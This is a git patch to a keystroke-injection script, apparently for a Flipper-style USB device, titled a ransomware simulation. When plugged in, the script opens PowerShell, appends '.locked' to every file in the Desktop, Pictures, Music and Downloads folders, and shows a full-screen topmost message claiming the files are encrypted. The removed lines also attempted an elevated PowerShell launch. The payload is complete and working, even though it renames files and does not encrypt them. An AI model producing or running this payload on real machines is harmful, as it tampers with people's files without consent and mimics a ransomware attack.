From 085fd437ff603bf59289857334f6b2b8bc39fd44 Mon Sep 17 00:00:00 2001 From: Mark <148797232+MarkCyber@users.noreply.github.com> Date: Mon, 20 May 2024 11:30:35 -0400 Subject: [PATCH] Update 1. RansomwareSimulation --- 1. RansomwareSimulation | 83 +++++++++++++++++++++++++++++------------ 1 file changed, 59 insertions(+), 24 deletions(-) diff --git a/1. RansomwareSimulation b/1. RansomwareSimulation index c8d64ec..d9746fe 100644 --- a/1. RansomwareSimulation +++ b/1. RansomwareSimulation @@ -1,30 +1,65 @@ -REM ######################################################################################################################### -REM ################ This script was created by github.com/MarkCyber ############ -REM ################ This script is intended to act as a simulation of a ransomware attack ############ -REM ################ This script will change all file extensions to .locked rather than encrypting the files ############ -REM ######################################################################################################################### - - -REM Set delay for flipper -DELAY 500 +REM This script was created by github.com/MarkCyber +REM This script simulates a ransomware attack by renaming files and displaying a message. +DELAY 1000 GUI r -DELAY 100 -STRING powershell -Command "Start-Process powershell -Verb runAs" -ENTER -DELAY 500 -ALT y -DELAY 500 - -REM Rename files in specified locations to append .locked to every file -STRING $locations = @('MyDocuments', 'Desktop', 'Pictures', 'Music'); $errorOccurred = $false; foreach ($loc in $locations) { $path = [Environment]::GetFolderPath($loc); $files = Get-ChildItem -Path $path -File; foreach ($file in $files) { $null = $file | Rename-Item -NewName {$file.Name + '.locked'}; if (-not $?){ $errorOccurred = $true } } } -STRING IF ($errorOccurred) { exit } -ENTER DELAY 1000 - +STRING powershell +ENTER +DELAY 3000 +REM Define the locations using correct SpecialFolder enumerations +STRING $folders = @( +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Desktop, +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyPictures, +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::MyMusic, +ENTER +DELAY 500 +STRING [System.Environment+SpecialFolder]::Downloads +ENTER +DELAY 500 +STRING ) +ENTER +DELAY 500 +REM Iterate over each location +STRING foreach ($folder in $folders) { +ENTER +DELAY 500 +STRING $path = [Environment]::GetFolderPath($folder) +ENTER +DELAY 500 +REM Get all files in the path and rename them +STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') } +ENTER +DELAY 500 +STRING } +ENTER +DELAY 2000 REM Display ransomware message -STRING Add-Type -AssemblyName PresentationFramework; $Window = New-Object System.Windows.Window; $Window.WindowStartupLocation = 'CenterScreen'; $Window.WindowState = 'Maximized'; $Window.Topmost = $true; $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'; $Window.ShowDialog() +STRING Add-Type -AssemblyName PresentationFramework ENTER -DELAY 1000 - +DELAY 500 +STRING $Window = New-Object System.Windows.Window +ENTER +DELAY 500 +STRING $Window.WindowStartupLocation = 'CenterScreen' +ENTER +DELAY 500 +STRING $Window.WindowState = 'Maximized' +ENTER +DELAY 500 +STRING $Window.Topmost = $true +ENTER +DELAY 500 +STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.' +ENTER +DELAY 500 +STRING $Window.ShowDialog() +ENTER +DELAY 2000 STRING exit ENTER